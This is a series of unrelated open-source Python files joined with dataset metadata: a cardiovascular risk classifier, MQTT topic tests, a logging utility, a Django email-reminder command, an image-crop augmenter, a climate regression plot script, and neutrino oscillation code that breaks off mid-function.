return True else: return False def _is_diastolic_risk(self): if self._patient._diastolic >= 80: return True else: return False def _is_dyslipidemia_risk(self): if self._patient._ldl > 130 or self._patient._hdl < 40 or self._patient._cholesterol > 200: return True else: return False def _is_pre_diabetes_risk(self): if self._patient._fasting_glucose >= 100 and self._patient._fasting_glucose <= 126 or self._patient._oral_glucose_tolerance >= 140 and self._patient._oral_glucose_tolerance < 200: return True else: return False def _is_hdl_negative_risk(self): if self._patient._hdl > 60: return True else: return False class RiskFactorAssessmentClassification(object): def __init__(self): pass def patient_risk_classification(self, value): if value <= 1: return self._low_risk_category(value) if value == 2: return self._moderate_risk_category(value) if value > 2: return self._high_risk_category(value) def _low_risk_category(self, value): return("Your risk total is %s. You are at a low risk for cardiovascular disease. Medical check-up no necessary for participation in physical activity." % value) def _moderate_risk_category(self, value): return("Your risk total is %s. You are at a moderate risk for cardiovascular disease. Medical check-up recommended for participation in vigorous physical activity." % value) def _high_risk_category(self, value): return("Your risk total is %s. You are at a high risk for cardiovascular disease. Medical check-up highly recommended before any physical activity." % value)
1.632813
2
tests/test_mqtt.py
sourcesimian/mqtt-kube
0
12751019
from mqtt_kube.mqtt import TopicMatcher class TestTopicMatcher: def test_basic(self): assert TopicMatcher('topic/one').match('topic/one') == True assert TopicMatcher('topic/two').match('topic/one') == False def test_plus(self): assert TopicMatcher('topic/+/plus').match('topic/one/plus') == True assert TopicMatcher('topic/+/plus').match('topic/one/extra/plus') == False assert TopicMatcher('++/plus').match('topic/one/plus') == False assert TopicMatcher('+one/plus').match('topic/one/plus') == False assert TopicMatcher('+ne/plus').match('one/plus') == False def test_hash(self): assert TopicMatcher('#').match('topic/one/plus') == True assert TopicMatcher('topic/#').match('topic/one/plus') == True assert TopicMatcher('topic/two/#').match('topic/one/plus') == False assert TopicMatcher('#/plus').match('one/plus') == False def test_plus_and_hash(self): assert TopicMatcher('+/+/plus/#').match('topic/one/plus/many/more') == True assert TopicMatcher('+/+/minus/#').match('topic/one/plus/many/more') == False
1.835938
2
eta/core/log.py
kunyilu/eta
1
12751147
<reponame>kunyilu/eta<filename>eta/core/log.py ''' Core logging infrastructure. Copyright 2017, Voxel51, Inc. voxel51.com <NAME>, <EMAIL> ''' # pragma pylint: disable=redefined-builtin # pragma pylint: disable=unused-wildcard-import # pragma pylint: disable=wildcard-import from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals from builtins import * # pragma pylint: enable=redefined-builtin # pragma pylint: enable=unused-wildcard-import # pragma pylint: enable=wildcard-import import logging import os import sys import eta import eta.core.utils as etau from eta.core.config import Config root_logger = logging.getLogger() logger = logging.getLogger(__name__) # Basic logging defaults DEFAULT_BASIC_LEVEL = logging.INFO DEFAULT_BASIC_FORMAT = "%(message)s" # Custom logging defaults DEFAULT_STREAM_TO_STDOUT = True DEFAULT_STDOUT_FORMAT = "%(message)s" DEFAULT_STDOUT_LEVEL = "INFO" DEFAULT_FILENAME = None DEFAULT_FILE_FORMAT = \ "%(asctime)s - %(name)-18s - %(levelname)-8s - %(message)s" DEFAULT_FILE_LEVEL = "INFO" DEFAULT_DATEFMT = "%Y-%m-%d %H:%M:%S" DEFAULT_ENCODING = "utf8" def basic_setup(level=DEFAULT_BASIC_LEVEL, fmt=DEFAULT_BASIC_FORMAT): '''Sets up basic logging to stdout. Args: level: the logging level. The default is DEFAULT_BASIC_LEVEL fmt: the logging format. The default is DEFAULT_BASIC_FORMAT ''' reset() handler = logging.StreamHandler(stream=sys.stdout) handler.setFormatter(logging.Formatter(fmt=fmt)) handler.setLevel(level) root_logger.addHandler(handler) def custom_setup(lc, rotate=False): '''Sets up custom logging. Args: lc: a LoggingConfig instance rotate: True/False. If True, any existing logs are rotated and new messages are written to a new logfile. If False, new messages are appended to the existing log (if any). The default is False ''' # Messages to log after setup msgs = [] # Reset logging msgs.append("Resetting logging") reset() # Stdout logging if lc.stream_to_stdout: stream_handler = logging.StreamHandler(stream=sys.stdout) stream_handler.setFormatter( logging.Formatter(fmt=lc.stdout_format, datefmt=lc.datefmt)) stream_handler.setLevel(getattr(logging, lc.stdout_level)) root_logger.addHandler(stream_handler) msgs.append("Logging to stdout at level %s" % lc.stdout_level) # File logging if lc.filename: etau.ensure_basedir(lc.filename) if rotate: msgs += _rotate_logs(lc.filename) file_handler = logging.FileHandler( lc.filename, mode="at", encoding=lc.encoding) file_handler.setFormatter( logging.Formatter(fmt=lc.file_format, datefmt=lc.datefmt)) file_handler.setLevel(getattr(logging, lc.file_level)) root_logger.addHandler(file_handler) msgs.append("Logging to %s at level %s" % (lc.filename, lc.file_level)) msgs.append("Logging initialized") # Initial logging output eta.startup_message() for msg in msgs: logger.info(msg) def set_logging_level(level): '''Sets the logging level to the given value. Args: level: the logging.<level> to set ''' for h in root_logger.handlers: h.setLevel(level) def flush(): '''Flushes logging handlers. It is only necessary to call this method when multiple processes are writing to a single log file (e.g., when running a pipeline). ''' for h in root_logger.handlers: h.flush() def reset(): '''Resets logging. Performs the following tasks: - removes all existing handlers from the root logger - sets the root logger level to DEBUG (the effective logging level is determined on a per-handler basis) - uses sys.excepthook to route all uncaught exceptions to the root logger ''' root_logger.handlers = [] root_logger.setLevel(logging.DEBUG) sys.excepthook = _excepthook def _rotate_logs(filename): # Locate existing logs logfile = _rotate_lambda(filename) num = 0 while os.path.isfile(logfile(num)): num += 1 # Rotate existing logs, if necessary msgs = [] if num > 0: msgs.append("Rotating %d existing log(s)" % num) for idx in range(num - 1, -1, -1): etau.move_file(logfile(idx), logfile(idx + 1)) return msgs def _rotate_lambda(filename): p, e = os.path.splitext(filename) patt = p + "-%d" + e return lambda num: patt % num if num > 0 else filename def _excepthook(*exc_info): root_logger.error("Uncaught exception", exc_info=exc_info) class LoggingConfig(Config): '''Logging configuration settings.''' def __init__(self, d): self.stream_to_stdout = self.parse_bool( d, "stream_to_stdout", default=DEFAULT_STREAM_TO_STDOUT) self.stdout_format = self.parse_string( d, "stdout_format", default=DEFAULT_STDOUT_FORMAT) self.stdout_level = self.parse_string( d, "stdout_level", default=DEFAULT_STDOUT_LEVEL) self.filename = self.parse_string( d, "filename", default=DEFAULT_FILENAME) self.file_format = self.parse_string( d, "file_format", default=DEFAULT_FILE_FORMAT) self.file_level = self.parse_string( d, "file_level", default=DEFAULT_FILE_LEVEL) self.datefmt = self.parse_string( d, "datefmt", default=DEFAULT_DATEFMT) self.encoding = self.parse_string( d, "encoding", default=DEFAULT_ENCODING)
1.289063
1
users/management/commands/send_overdue_reminders.py
maverick-labs-pune/wikirumours
0
12751275
import csv import datetime import os from django.contrib.gis.geos import Point from django.core.management import BaseCommand, CommandError from django.db import transaction from geopy import Nominatim from countries.models import Country from report.models import Report, Sighting, ReportedViaChoice from users.emails import overdue_reports_reminder from users.models import User class Command(BaseCommand): help = "compute first sighting" def handle(self, *args, **kwargs): send_overdue_reminders() def send_overdue_reminders(): for user in User.objects.filter(role__in=[User.COMMUNITY_LIAISON, User.MODERATOR, User.ADMIN]): if user.enable_email_reminders: overdue_tasks = user.get_overdue_tasks() if overdue_tasks.count() and user.email: overdue_reports_reminder(overdue_tasks, user) print(f"Log email reminder sent to {user.email}")
1.476563
1
src/wai/annotations/imgaug/isp/crop/component/_Crop.py
waikato-ufdl/wai-annotations-processors
0
12751403
<reponame>waikato-ufdl/wai-annotations-processors<filename>src/wai/annotations/imgaug/isp/crop/component/_Crop.py import imgaug.augmenters as iaa from wai.common.cli.options import TypedOption, FlagOption from wai.annotations.imgaug.isp.base.component import BaseImageAugmentation class Crop(BaseImageAugmentation): """ Stream processor which crops images. """ percent_from: float = TypedOption( "-f", "--from-percent", type=float, help="the minimum percent to crop from images" ) percent_to: float = TypedOption( "-t", "--to-percent", type=float, help="the maximum percent to crop from images" ) update_size: bool = FlagOption( "-u", "--update-size", help="whether to update the image size after the crop operation or scale back to original size" ) def _default_suffix(self): """ Returns the default suffix to use for images when using "add" rather than "replace" as mode. :return: the default suffix :rtype: str """ return "-cropped" def _can_augment(self): """ Checks whether augmentation can take place. :return: whether can augment :rtype: bool """ return (self.percent_from is not None) and (self.percent_to is not None) def _create_pipeline(self, aug_seed): """ Creates and returns the augmentation pipeline. :param aug_seed: the seed value to use, can be None :type aug_seed: int :return: the pipeline :rtype: iaa.Sequential """ keep_size = not self.update_size if self.percent_from == self.percent_to: return iaa.Sequential([ iaa.Crop(percent=self.percent_from, keep_size=keep_size) ]) else: return iaa.Sequential([ iaa.Crop(percent=(self.percent_from, self.percent_to), keep_size=keep_size) ])
1.601563
2
research/Master_Thesis/regression_map.py
pjpetersik/ninolearn
13
12751531
<gh_stars>10-100 from mpl_toolkits.basemap import Basemap from sklearn import linear_model from sklearn.metrics import r2_score import numpy as np import matplotlib.pyplot as plt from scipy.stats import pearsonr from ninolearn.IO.read_processed import data_reader from os.path import join from ninolearn.private import plotdir # ============================================================================= # Read # ============================================================================= reader = data_reader(startdate='1980-01', enddate='2018-11', lon_min=100, lon_max=300) iod = reader.read_csv('iod') nino = reader.read_csv('nino3M') taux = reader.read_netcdf('taux', dataset='NCEP', processed='anom') taux = taux.sortby('lat', ascending=False) sst = reader.read_netcdf('sst', dataset='ERSSTv5', processed='anom') sst = sst.sortby('lat', ascending=False) olr = - reader.read_netcdf('olr', dataset='NCAR', processed='anom') olr = olr.sortby('lat', ascending=False) # ============================================================================= # Regression analysis # ============================================================================= SSTA_gradient = np.nanmean(np.gradient(sst.loc[dict(lat=0, lon=slice(120, 280))], axis=0), axis=1) OLR_mean = olr.loc[dict(lat=slice(5, -5), lon=slice(150, 210))].mean(dim='lon').mean(dim='lat') X = np.stack((nino, OLR_mean), axis=1) reg = linear_model.LinearRegression(fit_intercept=False) taux_flat = taux.values.reshape(taux.shape[0],-1) reg.fit(X, taux_flat) pred = reg.predict(X) score = r2_score(taux_flat, pred, multioutput='raw_values') score2 = np.zeros_like(score) p = np.zeros_like(score) for i in range(score2.shape[0]): score2[i], p[i] = pearsonr(pred[:,i], taux_flat[:,i]) score_map = score.reshape((taux.shape[1],taux.shape[2])) score2_map = score2.reshape((taux.shape[1],taux.shape[2])) p_map = p.reshape((taux.shape[1],taux.shape[2])) coef_sst = reg.coef_[:,0].reshape((taux.shape[1],taux.shape[2])) * X[:,0].std() coef_olr = reg.coef_[:,1].reshape((taux.shape[1],taux.shape[2])) * X[:,1].std() #coef_iod = reg.coef_[:,2].reshape((taux.shape[1],taux.shape[2])) * X[:,2].std() # ============================================================================= # Plot # ============================================================================= plt.close("all") # Setup vmax = 10 levels = np.linspace(-vmax, vmax, 21, endpoint = True) levels_r2 = np.linspace(0, 0.8, 21, endpoint = True) # Generate the base plot lon2, lat2 = np.meshgrid(taux.lon, taux.lat) fig, axs = plt.subplots(2, 1, figsize=(9,5)) m = [] for i in range(2): m.append(Basemap(projection='merc',llcrnrlat=-30,urcrnrlat=30,\ llcrnrlon=100,urcrnrlon=300,lat_ts=5,resolution='c', ax=axs[i])) x, y = m[i](lon2, lat2) m[i].drawparallels(np.arange(-90., 120., 15.), labels=[1,0,0,0], color='grey') if i == 1: m[i].drawmeridians(np.arange(0., 360., 30.), labels=[0,0,0,1], color='grey') else: m[i].drawmeridians(np.arange(0., 360., 30.), color='grey') m[i].drawmapboundary(fill_color='white') m[i].drawcoastlines() cs_r2 = m[i].contourf(x, y, score2_map**2, vmin=0.0,vmax=0.8, levels = levels_r2, cmap=plt.cm.Greens, extend='max') cs_p = m[i].contourf(x, y, p_map, levels=[0, 0.01], hatches = ['//'], alpha=0) # Overlay the base plot with cs_sst = m[0].contour(x, y, coef_sst, vmin=-vmax, vmax=vmax, levels=levels, cmap=plt.cm.seismic) cs_olr = m[1].contour(x, y, coef_olr, vmin=-vmax, vmax=vmax, levels=levels, cmap=plt.cm.seismic) #cs_iod = m[2].contour(x, y, coef_iod, vmin=-vmax, vmax=vmax, levels=levels, cmap=plt.cm.seismic) # Color bar fig.subplots_adjust(right=0.7) cbar_ax1 = fig.add_axes([0.75, 0.15, 0.02, 0.7]) cbar_ax2 = fig.add_axes([0.85, 0.15, 0.02, 0.7]) fig.colorbar(cs_sst, cax= cbar_ax1, label=r'$\tau_x$[m$^2$s$^{-2}$]') fig.colorbar(cs_r2, cax = cbar_ax2, label=r'$r^2$') plt.savefig(join(plotdir, 'regression_taux.jpg'), dpi=360)
1.710938
2
pyCEvNS/oscillation.py
Ikaroshu/pyCEvNS
5
12751659
<gh_stars>1-10 """ neutrino oscillation related funtions """ from .parameters import * # solar number density at r=0.05 solar radius, unit is MeV^3 (natural unit) __ne_solar = 4.163053492437814e-07 __nu_solar = 1.0053941490424488e-06 __nd_solar = 7.618722503535536e-07 def survival_solar(ev, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e'): """ calculating survival/transitional probability of solar neutrino :param ev: neutrino energy in MeV :param epsi: nsi parameters :param nui: intial state :param nuf: final state, 0: electron neutrino, 1: muon neutrino, 2: tau neutrino :param op: oscillation parameters :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2} fi = dic[nui] ff = dic[nuf] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) v = np.sqrt(2) * gf * (__ne_solar * (epsi.ee() + np.diag(np.array([1, 0, 0]))) + __nu_solar * epsi.eu() + __nd_solar * epsi.ed()) hvac = umix @ m @ umix.conj().T def sorteig(w, vec): """ sort the eigenstates to make the resultant eigenvalue continuous """ minindex = 0 maxindex = 0 for j in range(3): if w[minindex] > w[j]: minindex = j for j in range(3): if w[maxindex] < w[j]: maxindex = j midindex = 3 - minindex - maxindex avec = np.array(vec) return np.array([avec[:, minindex], avec[:, midindex], avec[:, maxindex]]).T wr, vecr = np.linalg.eigh(hvac + v) utr = sorteig(wr, vecr) ws, vecs = np.linalg.eigh(hvac) uts = sorteig(ws, vecs) res = 0 for i in range(3): res += np.conj(utr[0, i]) * utr[0, i] * np.conj(uts[ff, i]) * uts[ff, i] return np.real(res) def survival_solar_amp(ev, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e', **kwargs): """ calculating survival/transitional amplitude of solar neutrino, this is just hack, not real amplitude! :param ev: neutrino energy in MeV :param epsi: nsi parameters :param nui: intial state :param nuf: final state, 0: electron neutrino, 1: muon neutrino, 2: tau neutrino :param op: oscillation parameters :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2} fi = dic[nui] ff = dic[nuf] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) v = np.sqrt(2) * gf * (__ne_solar * (epsi.ee() + np.diag(np.array([1, 0, 0]))) + __nu_solar * epsi.eu() + __nd_solar * epsi.ed()) hvac = umix @ m @ umix.conj().T def sorteig(w, vec): """ sort the eigenstates to make the resultant eigenvalue continuous """ minindex = 0 maxindex = 0 for j in range(3): if w[minindex] > w[j]: minindex = j for j in range(3): if w[maxindex] < w[j]: maxindex = j midindex = 3 - minindex - maxindex avec = np.array(vec) return np.array([avec[:, minindex], avec[:, midindex], avec[:, maxindex]]).T wr, vecr = np.linalg.eigh(hvac + v) utr = sorteig(wr, vecr) ws, vecs = np.linalg.eigh(hvac) uts = sorteig(ws, vecs) res = 0 for i in range(3): res += np.conj(utr[fi, i]) * utr[fi, i] * np.conj(uts[ff, i]) * uts[ff, i] return np.sqrt(np.real(res)) # using Caylay-Hamilton theorem to calculate survival probability, it has probems at transitsion probabilities # # def survival_probability(ev, length, epsi=NSIparameters(), nui=0, nuf=0, # op=ocsillation_parameters(), ne=2.2*6.02e23*(100*meter_by_mev)**3): # o23 = np.matrix([[1, 0, 0], # [0, np.cos(op['t23']), np.sin(op['t23'])], # [0, -np.sin(op['t23']), np.cos(op['t23'])]]) # u13 = np.matrix([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], # [0, 1, 0], # [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) # o12 = np.matrix([[np.cos(op['t12']), np.sin(op['t12']), 0], # [-np.sin(op['t12']), np.cos(op['t12']), 0], # [0, 0, 1]]) # umix = o23 * u13 * o12 # m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) # vf = np.sqrt(2) * gf * ne * (epsi.ee() + 3 * epsi.eu() + 3 * epsi.ed()) # hf = umix * m * umix.H + vf # w, v = np.linalg.eigh(hf) # # print(w) # b = e**(-1j*w*length) # # print(b) # a = np.array([[1, 1, 1], -1j * length * w, -length**2 * w**2]).T # # print(a) # x = np.linalg.solve(a, b) # tnp.matrix = x[0] + -1j * length * x[1] * hf - length**2 * x[2] * hf.dot(hf) # # print(tnp.matrix) # return abs(tnp.matrix[nui, nuf])**2 def survival_const(ev, length=0.0, epsi=NSIparameters(), op=oscillation_parameters(), ne=2.2 * 6.02e23 * (100 * meter_by_mev) ** 3, nui='e', nuf='e'): """ survival/transitional probability with constant matter density :param ev: nuetrino energy in MeV :param length: oscillation length in meters :param epsi: epsilons :param nui: initail flavor :param nuf: final flavor :param op: oscillation parameters :param ne: electron number density in MeV^3 :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} fi = dic[nui] ff = dic[nuf] length = length / meter_by_mev if nuf[-1] == 'r': op['delta'] = -op['delta'] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) vf = np.sqrt(2) * gf * ne * ((epsi.ee() + np.diag(np.array([1, 0, 0]))) + 3 * epsi.eu() + 3 * epsi.ed()) if nuf[-1] == 'r': hf = umix @ m @ umix.conj().T - np.conj(vf) else: hf = umix @ m @ umix.conj().T + vf w, v = np.linalg.eigh(hf) res = 0.0 for i in range(3): for j in range(3): theta = (w[i]-w[j]) * length res += v[ff, i] * np.conj(v[fi, i]) * np.conj(v[ff, j]) * v[fi, j] * (np.cos(theta) - 1j * np.sin(theta)) return np.real(res) def survival_const_amp(ev, length=0.0, epsi=NSIparameters(), op=oscillation_parameters(), ne=2.2 * 6.02e23 * (100 * meter_by_mev) ** 3, nui='e', nuf='e'): """ survival/transitional amplitude with constant matter density :param ev: nuetrino energy in MeV :param length: oscillation length in meters :param epsi: epsilons :param nui: initail flavor :param nuf: final flavor :param op: oscillation parameters :param ne: electron number density in MeV^3 :return: survival/transitional probability """ op = op.copy() dic = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} fi = dic[nui] ff = dic[nuf] length = length / meter_by_mev if nuf[-1] == 'r': op['delta'] = -op['delta'] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) vf = np.sqrt(2) * gf * ne * (epsi.ee() + np.diag(np.array([1, 0, 0])) + 3 * epsi.eu() + 3 * epsi.ed()) if nuf[-1] == 'r': hf = umix @ m @ umix.conj().T - np.conj(vf) else: hf = umix @ m @ umix.conj().T + vf w, v = np.linalg.eigh(hf) res = 0.0 for i in range(3): # for j in range(3): theta = (w[i]) * length res += v[ff, i] * np.conj(v[fi, i]) * (np.cos(theta) - 1j * np.sin(theta)) return res def survival_average(ev, epsi=NSIparameters(), op=oscillation_parameters(), ne=2.2 * 6.02e23 * (100 * meter_by_mev) ** 3, nui='e', nuf='e'): dic = {'e': 0, 'mu': 1, 'tau': 2, 'ebar': 0, 'mubar': 1, 'taubar': 2} op = op.copy() fi = dic[nui] ff = dic[nuf] if nuf[-1] == 'r': op['delta'] = -op['delta'] o23 = np.array([[1, 0, 0], [0, np.cos(op['t23']), np.sin(op['t23'])], [0, -np.sin(op['t23']), np.cos(op['t23'])]]) u13 = np.array([[np.cos(op['t13']), 0, np.sin(op['t13']) * (np.exp(- op['delta'] * 1j))], [0, 1, 0], [-np.sin(op['t13'] * (np.exp(op['delta'] * 1j))), 0, np.cos(op['t13'])]]) o12 = np.array([[np.cos(op['t12']), np.sin(op['t12']), 0], [-np.sin(op['t12']), np.cos(op['t12']), 0], [0, 0, 1]]) umix = o23 @ u13 @ o12 m = np.diag(np.array([0, op['d21'] / (2 * ev), op['d31'] / (2 * ev)])) vf = np.sqrt(2) * gf * ne * ((epsi.ee() + np.diag(np.array([1, 0, 0]))) + 3 * epsi.eu() + 3 * epsi.ed()) if nuf[-1] == 'r': hf = umix @ m @ umix.conj().T - np.conj(vf) else: hf = umix @ m @ umix.conj().T + vf w, v = np.linalg.eigh(hf) res = 0.0 for i in range(3): res += v[ff, i] * np.conj(v[fi, i]) * np.conj(v[ff, i]) * v[fi, i] return np.real(res) def survial_atmos(ev, zenith=1.0, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e'): """ survival probability of atmospherical neutrino, assuming 2 layers of the earth, and eath is perfect sphere, it depends on zenith angle :param ev: nuetrino energy in MeV :param zenith: cosine of zenith angle respect to the detector, upward is positive :param epsi: NSI parameters :param nui: initial flavor :param nuf: final flavor :param op: oscillation parameters :return: survival probability in this direction """ op = op.copy() n_core = 11850.56/1.672621898e-27/2*(meter_by_mev**3) n_mantle = 4656.61/1.672621898e-27/2*(meter_by_mev**3) r_core = 3480000 r_mantle = 6368000 cos_th = -np.sqrt(r_mantle**2 - r_core**2) / r_mantle if zenith >= 0: return 1 if nui == nuf else 0 elif zenith >= cos_th: length = -r_mantle * zenith * 2 return survival_const(ev, length, epsi=epsi, nui=nui, nuf=nuf, op=op, ne=n_mantle) else: vert = r_mantle * np.sqrt(1 - zenith**2) l_core = 2 * np.sqrt(r_core**2 - vert**2) l_mantle_half = -r_mantle * zenith - l_core / 2 res = 0 if nuf[-1] == 'r': f_list = ['ebar', 'mubar', 'taubar'] else: f_list = ['e', 'mu', 'tau'] for i in f_list: for j in f_list: res += survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=nui, nuf=i, op=op, ne=n_mantle) * \ survival_const_amp(ev, l_core, epsi=epsi, nui=i, nuf=j, ne=n_core) * \ survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=j, nuf=nuf, ne=n_mantle) return np.real(res * np.conj(res)) def survial_atmos_amp(ev, zenith=1.0, epsi=NSIparameters(), op=oscillation_parameters(), nui='e', nuf='e'): """ survival amplitude of atmospherical neutrino assuming 2 layers of the earth, and eath is perfect sphere, it depends on zenith angle :param ev: nuetrino energy in MeV :param zenith: cosine of zenith angle respect to the detector, upward is positive :param epsi: NSI parameters :param nui: initial flavor :param nuf: final flavor :param op: oscillation parameters :return: survival probability in this direction """ op = op.copy() n_core = 11850.56/1.672621898e-27/2*(meter_by_mev**3) n_mantle = 4656.61/1.672621898e-27/2*(meter_by_mev**3) r_core = 3480000 r_mantle = 6368000 cos_th = -np.sqrt(r_mantle**2 - r_core**2) / r_mantle if zenith >= 0: return 1 if nui == nuf else 0 elif zenith >= cos_th: length = -r_mantle * zenith * 2 return survival_const(ev, length, epsi=epsi, nui=nui, nuf=nuf, op=op, ne=n_mantle) else: vert = r_mantle * np.sqrt(1 - zenith**2) l_core = 2 * np.sqrt(r_core**2 - vert**2) l_mantle_half = -r_mantle * zenith - l_core / 2 res = 0 if nuf[-1] == 'r': f_list = ['ebar', 'mubar', 'taubar'] else: f_list = ['e', 'mu', 'tau'] for i in f_list: for j in f_list: res += survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=nui, nuf=i, op=op, ne=n_mantle) * \ survival_const_amp(ev, l_core, epsi=epsi, nui=i, nuf=j, ne=n_core) * \ survival_const_amp(ev, l_mantle_half, epsi=epsi, nui=j, nuf=nuf, ne=n_mantle) return res class Oscillator: def __init__(self, layers, nsi_parameter: NSIparameters, oscillation_parameter: OSCparameters, **kwargs): """ init :param layers: :param nsi_parameter: :param oscillation_parameter: :param kwargs: the parameters that goes into each layer """ self.layers = layers self.nsi_parameter = nsi_parameter self.oscillation_paramter = oscillation_parameter self.kwargs = kwargs def _dfs(self, ev, amplist, inter, cur_layer, cur_value, nui, nuf): if cur_layer == len(self.layers)-1: cur_value *= self.layers[cur_layer](ev, nui=nui, nuf=nuf, epsi=self.nsi_parameter, op=self.oscillation_paramter, **self.kwargs) amplist.append(cur_value) return for internu in inter: cv = cur_value * self.layers[cur_layer](ev, nui=nui, nuf=internu, epsi=self.nsi_parameter, op=self.oscillation_paramter, **self.kwargs) self._dfs(ev, amplist, inter, cur_layer+1, cv, internu, nuf) def transition_probability(self, ev, nui, nuf): if (nui[-1] == 'r' and nuf[-1] != 'r') or (nui[-1] != 'r' and nuf[-1] == 'r'): return 0 inter = ['e', 'mu', 'tau'] if nui[-1] == 'r': inter = ['ebar', 'mubar', 'taubar'] amplist = [] self._dfs(ev, amplist, inter, 0, 1, nui, nuf) amp = sum(amplist) return np.real(amp * np.conj(amp)) def transform(self, flux): if flux.nu is None: nu = None else: nu = {'ev': flux.ev} for flavor in ['e', 'mu', 'tau']: if flux.nu[flavor] is not None: if 'e' not in nu: nu['e'] = np.zeros_like(flux.ev) nu['mu'] = np.zeros_like(flux.ev) nu['tau'] = np.zeros_like(flux.ev) for i in range(flux.ev.shape[0]): nu['e'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'e') nu['mu'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'mu') nu['tau'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'tau') for flavor in ['ebar', 'mubar', 'taubar']: if flux.nu[flavor] is not None: if 'ebar' not in nu: nu['ebar'] = np.zeros_like(flux.ev) nu['mubar'] = np.zeros_like(flux.ev) nu['taubar'] = np.zeros_like(flux.ev) for i in range(flux.ev.shape[0]): nu['ebar'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'ebar') nu['mubar'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'mubar') nu['taubar'][i] += flux.nu[flavor][i] * self.transition_probability(flux.ev[i], flavor, 'taubar') if flux.delta_nu is None: dnu = None else: dnu = {} for flavor in ['e', 'mu', 'tau']: if flux.delta_nu[flavor] is not None: if 'e' not in dnu: dnu['e'] = [] dnu['mu'] = [] dnu['tau'] = [] for d in flux.delta_nu[flavor]: dnu['e'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'e'))) dnu['mu'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'mu'))) dnu['tau'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'tau'))) for flavor in ['ebar', 'mubar', 'taubar']: if flux.delta_nu[flavor] is not None: if 'ebar' not in dnu: dnu['ebar'] = [] dnu['mubar'] = [] dnu['taubar'] = [] for d in flux.delta_nu[flavor]: dnu['ebar'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'ebar'))) dnu['mubar'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'mubar'))) dnu['taubar'].append((d[0], d[1]*self.transition_probability(d[0], flavor, 'taubar'))) from .flux import NeutrinoFlux return NeutrinoFlux(continuous_fluxes=nu, delta_fluxes=dnu, norm=flux.norm/((100 * meter_by_mev) ** 2)) def change_parameters(self, **kwargs): for k, v in kwargs.items(): self.kwargs[k] = v class OscillatorFactory: def __init__(self): self.oscillator_list = ['solar', 'atmospheric', 'beam'] def print_available(self): print(self.oscillator_list) def get(self, oscillator_name, **kwargs): if oscillator_name not in self.oscillator_list: raise Exception('such oscillator not in factory yet, consider build your own.') if oscillator_name == 'solar': return Oscillator([survival_solar_amp], **kwargs) if oscillator_name == 'beam': if 'length' not in kwargs: raise Exception('Please specify the oscillation length in meters.') return Oscillator([survival_const_amp], **kwargs) if oscillator_name == 'atmospheric': if 'zenith' not in kwargs: 